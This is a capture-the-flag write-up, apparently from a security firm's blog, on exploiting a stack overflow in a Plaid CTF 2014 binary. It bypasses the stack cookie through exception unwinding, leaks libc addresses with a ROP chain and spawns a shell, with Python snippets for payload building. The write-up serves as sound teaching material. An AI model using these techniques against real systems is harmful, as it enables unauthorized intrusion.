Plaid CTF 2014 harry_potter Challenge
April 24, 2014
Accuvant sponsored the annual Plaid CTF event this year. It is one of our favorite events of the year for several reasons. First, we believe heavily in the lessons that these exercises teach. The time limits bring a motivating pressure; the result is often amazing feats of hacking that will be remembered for years to come. Solving challenges teaches new techniques and reinforces existing knowledge. We've been consistently impressed with the CTF events the PPP team has put on for the past several years. We were ecstatic to sponsor and participate. We also took on several of the challenges ourselves. What follows is a close look at the event's second-highest-value exploitation challenge.
PS. If you're interested in tackling challenges such as this on a regular basis, consider applying to join Accuvant's growing team of security researchers. We have open positions that cover a wide range of specialties and skill levels. We hope to hear from you soon!
Point Value: 300 (was doubled from 150 during the game)
If only we could get into this system, running at 184.108.40.206:666, we might get an idea of where The Plague has been keeping the Prime Factorizer.
The provided challenge program was listening on a TCP port on a remote machine. No other access was provided to said machine. However, the organizers graciously linked to a binary to examine.
Digging into the Binary
Opening the binary with IDA Pro showed it was an ELF64 binary for Linux. Unfortunately, we didn't have a decompiler handy. Our appetite for assembly was healthy anyway, so we pushed forward. Digging deeper, we quickly located the main function by inspecting the arguments to the call to __libc_start_main, shown in Figure 1. The argument was originally loc_400EE0, but we renamed it to main and navigated to it first thing.
Figure 1. _start with the typical call to __libc_start_main.
We followed the main cross-reference and converted the destination instructions to a procedure. Next we toggled graph mode and saw the first basic block, which appears in Figure 2.
Figure 2. The first basic block of main.
The main function starts by using the cerr iostream to display a message. Following that, it calls a function that we named authorize. We'll take a closer look at authorize in a moment, but first it's important to note three things about main.
- If authorize returns non-zero, the program will go off on a deep code path whose functionality is not immediately clear.
- If authorize returns zero, main informs the user that they entered the wrong password.
- The entire main function body appears to be wrapped in a try/catch block. This fact is evidenced by the floating, seemingly disconnected, basic blocks off to the side.
The string displayed both prior to calling authorize and when the return value is zero suggests the program expects a password. However, the password isn't checked in main so we proceeded to examine authorize. The first basic block is depicted in Figure 3.
Figure 3. The first basic block of authorize.
Looking at the function's local variables, we saw a couple of stack buffers. Reading on in the disassembly, we saw two calls to a function we named do_read_something. That function takes three parameters: a file descriptor (zero in this case), a destination buffer, and a number of bytes to read. The astute reader might already see a problem, but we'll forgo that for a moment to finish reversing the function.
After reading the length-prefixed string, we saw a call to a subroutine which we determined implements the memmem function (a GNU extension). The authorize function uses memmem to look for the string "PASSWORD" inside the input data. If the substring is not found, authorize prints an error message and returns zero. If "PASSWORD" is found, authorize creates a SHA512 hash of the string starting 9 bytes in and compares it to a digest at 0x404448 (in the binary's .rodata section). Googling for the hash revealed the plaintext value.
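The check described above can be sketched in Python. This is only an approximation of the reversed logic, not the binary's actual code: the names `authorize`, `MARKER`, and `SKIP` are ours, `bytes.find` stands in for memmem, and we assume the 9-byte offset is counted from the start of the "PASSWORD" match and that the hash covers the rest of the input. The real digest at 0x404448 is not reproduced here; the placeholder is derived from the plaintext the write-up reports.

```python
import hashlib

MARKER = b"PASSWORD"
SKIP = 9  # assumed: len(b"PASSWORD="), counted from the start of the match


def authorize(data: bytes, expected_digest: bytes) -> bool:
    """Return True when the text after the marker hashes to expected_digest."""
    pos = data.find(MARKER)  # stand-in for memmem()
    if pos < 0:
        return False  # the binary prints an error and returns zero here
    candidate = data[pos + SKIP:]
    return hashlib.sha512(candidate).digest() == expected_digest


# Placeholder digest computed from the reported plaintext, not copied from .rodata.
EXPECTED = hashlib.sha512(b"wrong").digest()

print(authorize(b"PASSWORD=wrong", EXPECTED))
print(authorize(b"no marker here", EXPECTED))
```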
Supplying the correct string ("PASSWORD=wrong") caused authorize to return 1 to main. Upon returning, main displayed the excellent monkey-themed ASCII art shown in Figure 4.
Figure 4. Excellent ASCII art from the challenge creator.
If you didn't specify the correct password or you put your guess in the wrong format, authorize returned 0 to main and you were told about your failure. Regardless of password correctness, the program disconnected you. Being disconnected was clearly at odds with our goal of obtaining a shell. This path was a red herring, but it was fun nevertheless. Thanks! Next, we turned our attention back to the two calls to do_read_something.
About the Bug
Remember from Figure 3 that there are two calls to do_read_something. The first reads a 32-bit integer value into a local variable we named v_int. The second call reads v_int bytes into a stack buffer of 1024 bytes. The root cause issue is a lack of validation or sanitization done on v_int. Specifying more than 1024 bytes results in a stack buffer overflow. Ahh, the undefined behavior that we all know and love...
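To make the trigger concrete, here is a minimal sketch of how a length-prefixed message that overruns the 1024-byte buffer could be built. The helper names `build_message` and `overflow_by` are hypothetical, and we assume the 32-bit length is sent as an unsigned little-endian value, which is the natural encoding on x86-64 but is not stated explicitly above.

```python
import struct

BUF_SIZE = 1024  # size of the stack buffer described above


def build_message(body: bytes) -> bytes:
    """Prefix body with its length as an (assumed) little-endian 32-bit integer."""
    return struct.pack("<I", len(body)) + body


def overflow_by(extra: int, fill: bytes = b"A") -> bytes:
    """Build a message whose body runs `extra` bytes past the buffer."""
    return build_message(fill * (BUF_SIZE + extra))


msg = overflow_by(36)
print(len(msg), struct.unpack("<I", msg[:4])[0])
```

With `extra=36` the body is 1060 bytes long, which matches the first crash length discussed later.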
The trick in this challenge was not finding the bug, but rather figuring out how to exploit it. The authorize function contains stack cookies, which throws a wrench in our proverbial machine. So what could we do?
Next we tried sending various lengths of our favorite character (0x41). We started by overwriting just a small amount of data after the buffer. Figure 5 shows the output we saw when we overwrote only 32 bytes beyond the buffer.
Figure 5. Crash output on the __stack_chk_fail path.
We expected this output since we saw calls to __stack_chk_fail, indicating the stack was protected against buffer overflows. In addition, this output divulges information about the remote process's address space. We could clearly see that NX was enabled. Running the command a couple of times showed us that ASLR was enabled as well. We confirmed these findings by looking at the binary too, just to be safe:
Figure 6. Verifying exploit mitigations present.
The two commands in Figure 6 confirm that although the binary has a non-executable stack, it does *NOT* have PIE enabled. This means we can count on the addresses within the binary to remain constant. This is a key factor in successfully exploiting this process.
At this point we spun up an environment to be able to debug the provided binary. We hypothesized that it was running under some kind of inetd setup since it didn't implement any socket functionality. We turned to socat to mimic inetd. The two scripts in Figure 7 did the job.
Figure 7. Scripts to emulate inetd using socat.
With the ability to debug, we continued trying larger and larger overwrite lengths. Each time we saw a new crash we noted it and dug in to see what we could do with it.
Crash 1 - 1060 bytes
The next crash we saw occurred while unwinding the stack deep in the compiler runtime. It happens while generating the stack trace that is included in the output on the __stack_chk_fail path. An excerpt from the debugging session is presented in Figure 8.
Figure 8. Crash context with 36 bytes overwritten, in _Unwind_Backtrace.
Although the value of rcx was completely controlled, getting full code execution from this crash didn't look easy. We tried several different values for rcx, which corresponded to saved rip values from previous frames. As long as the value was readable, it led to that value being printed in the stack trace. The algorithm stops when it reaches a NULL rip. When properly terminated, the rest of the error output was printed and the program was aborted as was expected due to the corrupted cookie. Without success, we continued to try larger strings.
Crash 2 - 1316 bytes
The next interesting crash happened when we used a string of 1316 bytes. An excerpt from the debugging session follows in Figure 9.
Figure 9. Crash context with 292 bytes overwritten.
This crash was fairly interesting as it was trying to take the length of a string specified by a pointer under our control. It turns out that we corrupted the argv of the program. We tried pointing it to the Global Offset Table (GOT) entry for the read function from libc and witnessed the output from Figure 10.
Figure 10. The address of read in libc leaked.
As you can see from the output, we successfully leaked the value back to ourselves (in this case it was 0x7f74dba2dfd0). After printing this value out, the program crashed in the unwinding code again. We determined this context to be the same call stack as before, so we continued on.
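Because the pointer is printed as a C string, the leak arrives as raw little-endian bytes that stop at the first NUL. A small sketch of turning those bytes back into an address follows. The helper name `decode_leak` is ours, and it assumes the caller has already isolated the leaked bytes from the surrounding error text.

```python
def decode_leak(raw: bytes) -> int:
    """Convert leaked little-endian pointer bytes (NUL-truncated) into an integer."""
    if len(raw) > 8:
        raise ValueError("a 64-bit pointer is at most 8 bytes")
    # The two high bytes of a user-space address are zero, so they are not printed.
    return int.from_bytes(raw.ljust(8, b"\x00"), "little")


leak = bytes.fromhex("d0dfa2db747f")  # the six bytes behind the value quoted above
print(hex(decode_leak(leak)))  # 0x7f74dba2dfd0
```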
Crash 3 - 1332 bytes
When passing only a few more bytes, we got a different crash. This time we crashed in the getenv function as seen in Figure 11.
Figure 11. Crash context with 308 bytes overwritten.
Like before, we crashed in code dealing with printing the stack corruption protection failure. This time we corrupted environ. Controlling this means that we could influence several environment related settings. However, we determined none of them would get us closer to a shell. To avoid crashing here, we simply set the pointer value to NULL. After doing so, the crash in the unwinding code reappeared and we continued experimenting with longer lengths.
Crash 4 - >= 9224 bytes
After the crash inside getenv, we didn't get any more new crashes until we reached a rather large amount of data. Figure 12 shows the resulting debugger output.
Figure 12. Crash context inside getenv.
This crash occurred inside libc code while initializing the heap. Looking deeper, it turned out to be related to the environment variables being corrupted. We could control these pointers, but it wasn't immediately clear how setting various flags for the heap implementation would yield a better primitive. As before, we set the pointer to NULL and tried again. This time, the crash shown in Figure 13 appeared.
Figure 13. Crash context unwinding with _Unwind_RaiseException.
With this much input, we didn't crash while allocating an exception. Rather, we crashed again inside unwinding code. However, this time it was called from __cxa_throw instead of __stack_chk_fail. We also noticed that the program was no longer printing the "BAD FORMAT" error. Instead it printed "EXCEPTION: Error during read". To get a better understanding, we took a closer look at the do_read_something function in Figure 14.
Figure 14. Control flow graph of do_read_something.
This function loops trying to read data until one of two things happens: all of the expected data is successfully received or an error occurs. In the case the latter happens, do_read_something raises an exception using throw.
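The loop's behavior can be modeled in a few lines of Python. This is a sketch of the control flow as we understood it, not a translation of the disassembly: the exception class `ReadError` is a stand-in for whatever C++ type the binary throws, and we assume that both a failed read and an end-of-file count as errors.

```python
import os


class ReadError(Exception):
    """Stand-in for the C++ exception thrown by the challenge binary."""


def do_read_something(fd: int, count: int) -> bytes:
    """Read exactly `count` bytes from fd, raising ReadError on any failure."""
    data = bytearray()
    while len(data) < count:
        try:
            piece = os.read(fd, count - len(data))
        except OSError as exc:
            raise ReadError("Error during read") from exc
        if not piece:  # assumed: EOF (peer disconnected) is treated as an error
            raise ReadError("Error during read")
        data += piece
    return bytes(data)


r, w = os.pipe()
os.write(w, b"abcdef")
print(do_read_something(r, 6))
```

Python cannot reproduce the second failure mode discussed next, where read fails because the destination address is invalid, since `os.read` allocates its own buffer.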
In normal circumstances, there are only two ways to get read to fail. The first is to disconnect from the remote host. This is less than desirable, since we wanted to get a shell. Further, we knew that ASLR was in effect and thus we would need to leak some memory address too. The other, and more useful, method is to cause read to try to write to an invalid memory address. This was exactly what was happening when we sent more than 9224 bytes.
At this point, we were crashing with rcx fully controlled but weren't sure exactly what to set it to. On a whim, we tried setting it to the original return address value (the one there before we smashed it, 0x400f00). Then we got the crash shown in Figure 15.
Figure 15. Crash context with the original return address restored.
This was MUCH better!! This is the type of crash one gets when the memory address about to be popped into rip by the retq instruction is not mapped. Setting it to a mapped value would redirect the flow of execution to the specified address. Thus, we had full control of rip. With such a primitive achieved, we started to see the light at the end of the tunnel. We moved towards building our payload that would give us a shell.
Getting a Shell
Despite having control of the program counter, we still needed to leak a memory address and use it in a subsequent request. The general strategy was simply to execute system("/bin/sh") and thus obtain the key for the challenge. The first step towards success was constructing a payload based on an address leaked from libc. We already experimented with leaking the address of the read function before, so this was a logical choice. But how could we keep the session open?
Looking again at main we saw an opportunity to re-use the code that printed the password prompt. We chose the location 0x400eee, which corresponds to the call to std::ostream::operator<< in main. We quickly put together a small Return Oriented Programming (ROP) gadget sequence. We used two gadgets to set the rsi and rdi registers to the addresses of read in the GOT and std::cerr, respectively. Testing the memory disclosure exploit successfully gave us the address we desired. The only limitation to this technique was that output would terminate at the first NUL byte. This caused problems on occasion (when the leaked address contained a NUL) but nothing running the exploit again couldn't solve. :)
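A gadget sequence of this shape could be assembled as follows. This is a hedged sketch: only 0x400eee comes from the text above. The gadget addresses, the GOT slot, and the std::cerr address are parameters with made-up values in the usage line, and we assume each gadget is a plain `pop reg; ret`. Where the chain sits inside the overflow is not shown.

```python
import struct


def p64(value: int) -> bytes:
    """Pack an address as a little-endian 64-bit value."""
    return struct.pack("<Q", value)


def build_leak_chain(pop_rdi: int, pop_rsi: int, cerr_addr: int,
                     read_got: int, print_call: int = 0x400EEE) -> bytes:
    """Set rsi = &GOT[read], rdi = &std::cerr, then return into the print call."""
    return b"".join([
        p64(pop_rsi), p64(read_got),   # rsi: string pointer to print (the GOT entry)
        p64(pop_rdi), p64(cerr_addr),  # rdi: the ostream to print to
        p64(print_call),               # call to operator<< inside main
    ])


# All four addresses below are placeholders, not values taken from the binary.
chain = build_leak_chain(pop_rdi=0x401111, pop_rsi=0x402222,
                         cerr_addr=0x605000, read_got=0x604000)
print(chain.hex())
```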
What's more, this exploit also happened to re-enter the vulnerable code, allowing us to trigger the vulnerability again. This is exactly what we needed in order to utilize the information we just leaked. We refactored our exploit to send a secondary dynamic payload which we built based on the leaked address of read in libc. Unfortunately, it worked in our test environment but didn't work against the challenge server. Ugh.
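Building the second payload from the leak comes down to simple offset arithmetic. The sketch below shows that step in isolation. The function name `resolve` is ours, and both offsets in the usage line are invented for illustration, since the real ones depend on the exact libc build on the target.

```python
PAGE_MASK = 0xFFF


def resolve(leaked_read: int, read_offset: int, target_offset: int) -> int:
    """Derive the runtime address of another libc symbol from a leaked read()."""
    libc_base = leaked_read - read_offset
    if libc_base & PAGE_MASK:
        # A misaligned base usually means the offset belongs to a different libc.
        raise ValueError("libc base is not page aligned; wrong offsets?")
    return libc_base + target_offset


# Hypothetical offsets; only the leaked value appears in the write-up.
system_addr = resolve(0x7F74DBA2DFD0, read_offset=0xEAFD0, target_offset=0x46640)
print(hex(system_addr))
```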
Getting our exploit working reliably against the challenge server took extra effort. Tracing locally showed that the data received by the second trigger of the vulnerability was somewhat non-deterministic. After some thought, we decided this was likely due to a subtle interaction between the way stdin buffers input and random space added at the bottom of the stack when a process is created. We solved this by sending an initial payload with our ROP chain and then sending 8 bytes at a time until we received the "EXCEPTION" message. Then we could read the leaked data, craft our secondary exploit payload, and send it along reliably. After making these changes, we ran the exploit against the challenge server and obtained a shell.
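The drip-feeding step might look roughly like this. It is a sketch of the idea rather than our actual exploit code: the function name, the polling timeout, and the chunk limit are all assumptions, and the 8-byte filler content is arbitrary.

```python
import socket


def drip_until_marker(sock, marker: bytes = b"EXCEPTION",
                      chunk: bytes = b"A" * 8, max_chunks: int = 4096,
                      poll_seconds: float = 0.2) -> bytes:
    """Send 8 bytes at a time until the marker shows up in the response."""
    sock.settimeout(poll_seconds)
    received = b""
    for _ in range(max_chunks):
        sock.sendall(chunk)
        try:
            data = sock.recv(4096)
        except socket.timeout:
            continue  # nothing yet: read() has not faulted, so keep feeding
        if not data:
            break  # peer closed the connection
        received += data
        if marker in received:
            return received
    raise RuntimeError("marker not seen; the process may have died")
```

After the marker arrives, the caller would go on to read the leaked address and send the second-stage payload on the same socket.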
This challenge was very interesting and required exploring new exploitation mitigation bypass techniques. It is likely that very few people know about the technique showcased. Although this technique only applies in specific circumstances, it nonetheless advances the state of the art in exploitation. Those well versed in Windows exploitation will be quick to see similarities between this technique and the venerable SEH bypass technique. Mix in a few subtle complications stemming from non-determinism and buffering and it's easy to see why the point value for this challenge was increased during the game. A+++ will hack again!